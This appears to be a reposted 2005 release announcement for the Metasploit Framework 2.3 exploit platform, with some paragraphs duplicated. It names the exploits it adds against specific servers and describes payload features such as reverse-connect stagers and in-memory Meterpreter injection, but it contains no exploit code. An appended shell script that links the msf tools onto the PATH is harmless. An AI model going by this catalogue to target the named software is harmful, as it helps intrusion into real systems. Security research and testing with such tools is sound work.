The Opcode Database now includes Service Pack 1 for Windows 2003 Server, increasing the record count to over 10 million. We would like to thank Catalin Patulea for helping us optimize and improve the database -- queries are now drastically faster.
The Framework development team consists of four active members and a handful of part-time contributors. Check out the 'Credits' exploit module for a complete list of contributors.
You can subscribe to the Metasploit Framework mailing list by sending a blank email to framework-subscribe[at]metasploit.com. This is the preferred way to submit bugs, suggest new features, and discuss the Framework with other users.
If you would like to contact us directly, please email us at: msfdev[at]metasploit.com.
For more information about the Framework and this release in general, please refer to the online documentation, particularly the User Guide: http://metasploit.com/projects/Framework/documentation.html
Enjoy!
- The Metasploit Framework Development Team ( hdm, spoonm, skape, and vlad902 )
Metasploit Framework 2.3 released Posted by boss on Wednesday, 12 January 2005 @ 11:30:52 EST (1397 reads) Topic Metasploit
Anonymous writes "
The Metasploit Framework is an advanced open-source exploit development platform. The 2.3 release includes three user interfaces, 46 exploits and 68 payloads.
The Framework will run on any modern operating system that has a working Perl interpreter. The Windows installer includes a slimmed-down version of the Cygwin environment.
Some highlights in this release:
- Complete overhaul of the Framework payload collection
  + Win32 ordinal-stagers are now included (92-byte reverse connect)
  + A handful of new sparc payloads have been added (sol, linux, bsd)
  + Reliability problems have been resolved in bsd, linux, and win32
  + New udp-based linux shell stagers and shell payloads
  + New size-optimized Mac OS X encoders and payloads
- Includes the win32 version of the Meterpreter
  + Dynamically load new features over the network w/o disk access
  + In-memory dll injection of the basic meterpreter shell
  + Current extensions include Fs, Process, Net, and Sys
  + Extensive documentation is available online: http://metasploit.com/projects/Framework/docs/meterpreter.pdf
- Complete rewrite of the 'msfweb' user interface
  + Generate and encode stand-alone shellcode from the web interface
  + The interface is skinnable and includes three different themes
  + Streaming HTTP is used to provide a 100% web-based shell
  + Ability to set advanced options in the web interface
- Massive speed enhancements in msfconsole and msfweb
  + Snappier response and quicker load times on older systems
  + Optimizations made to various sort/search algorithms
  + Modules are no longer reloaded after each exploit
- New exploits
  + Microsoft WINS Service Memory Overwrite (MS04-045)
  + Samba trans2open() Buffer Overflow (Mac OS X)
  + 4D WebSTAR FTP Server Buffer Overflow (Mac OS X)
  + Veritas Name Service Registration Buffer Overflow
  + AOL Instant Messenger 'goaway' Buffer Overflow
  + IPSwitch IMail IMAPD 'delete' Buffer Overflow
  + Seattle Labs Mail Server POP3 Buffer Overflow
  + UoW IMAPD Buffer Overflow (sparc, ia32)
  + IRIX lpdsched Remote Command Execution
  + CDE dtspcd Buffer Overflow (Solaris)
  + IIS 4.0 ism.dll HTR Buffer Overflow
  + IIS w3who.dll ISAPI Buffer Overflow
This release is available from the Metasploit.com web site:
- Unix: http://metasploit.com/tools/framework-2.3.tar.gz
- Win32: http://metasploit.com/tools/framework-2.3.exe
Screen shots of the new release are online and available from: http://metasploit.com/projects/Framework/screenshots.html
A demonstration of the new msfweb interface is running live from: http://metasploit.com:55555/
Exploit modules designed for the 2.2 release should maintain compatibility with 2.3. If you run into any problems using older modules with this release, please let us know.
The Framework development team consists of four active members and a handful of part-time contributors. Check out the 'Credits' exploit module for a complete list of contributors.
You can subscribe to the Metasploit Framework mailing list by sending a blank email to framework-subscribe[at]metasploit.com. This is the preferred way to submit bugs, suggest new features, and discuss the Framework with other users.
If you would like to contact us directly, please email us at: msfdev[at]metasploit.com.
Starting with the 2.2 release, it is now possible to perform a system-wide installation of the Framework. Simply extract the tarball into the directory of your choice and create symbolic links from the msf* executables to a directory in the system path. Users may maintain their own exploit module collections by placing them into ~/.msf/exploits/. If you are interested in adding the Framework to an operating system distribution, please drop us a line and we will gladly help with the integration and testing process.
For more information about the Framework and this release in general, please refer to the online documentation, particularly the User Guide:
http://metasploit.com/projects/Framework/documentation.html
The Opcode Database has been refactored in order to support more granular queries. The new version provides users with the ability to easily cross reference specific opcode types, classes, and meta classes across one or more modules for one or more operating system versions. This level of granular control allows for a robust and flexible interface that can be used to determine opcode portability. Aside from opcodes themselves, the opcode database also contains detailed information about the segments, imports, and exports that are associated with each module in the database.
A quick overview of the features included in the new database is:
- Granular searching of opcodes of a specific type, class, and meta class.
- Searching modules provided directly from Windbg's module list.
- Cross referencing opcodes across various operating system versions.
- Detailed module information including segments, imports, and exports.
You can access the beta version of the new Opcode Database at:
http://metasploit.com/opcode_beta.html
Enjoy!
- The Metasploit Framework Development Team ( hdm, spoonm, skape, and vlad902 )
Dailydave mailing list Dailydave@lists.immunitysec.com
https://lists.immunitysec.com/mailman/listinfo/dailydave"
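The system-wide installation described in the 2.3 announcement above (symlink the msf* executables onto the PATH, keep per-user modules under ~/.msf/exploits/), carried out as an added example script that is not part of the announcement or of the Metasploit project; the framework directory, bin directory and home directory it uses are constructed stand-ins.

```shell
#!/bin/sh
# Added example, not Metasploit project code: lay out a system-wide
# Framework 2.x install as the 2.3 release notes describe. Every path
# used below is constructed for the demonstration.

# Link every executable msf* file from srcdir into bindir and print how
# many links were made. Non-executable msf* files (docs, data) are skipped
# so that only real tools land on the PATH.
install_msf_links() {
    srcdir=$1
    bindir=$2
    [ -d "$srcdir" ] || { echo "no such directory: $srcdir" >&2; return 1; }
    mkdir -p "$bindir"
    count=0
    for tool in "$srcdir"/msf*; do
        [ -f "$tool" ] && [ -x "$tool" ] || continue
        ln -sf "$tool" "$bindir/$(basename "$tool")"
        count=$((count + 1))
    done
    echo "$count"
}

# Create the per-user exploit module directory and print its path.
setup_user_modules() {
    mkdir -p "$1/.msf/exploits" && echo "$1/.msf/exploits"
}

# Demo against a constructed stand-in for an extracted framework-2.3 tree.
demo() {
    work=$(mktemp -d)
    src="$work/framework-2.3"
    mkdir -p "$src"
    for t in msfconsole msfcli msfweb; do
        printf '#!/bin/sh\necho %s\n' "$t" > "$src/$t"
        chmod +x "$src/$t"
    done
    echo "not a tool" > "$src/msfdoc.txt"   # non-executable: must be skipped
    n=$(install_msf_links "$src" "$work/bin")
    mods=$(setup_user_modules "$work/home")
    echo "linked $n tools into $work/bin; user modules go in $mods"
    rm -rf "$work"
}

demo
```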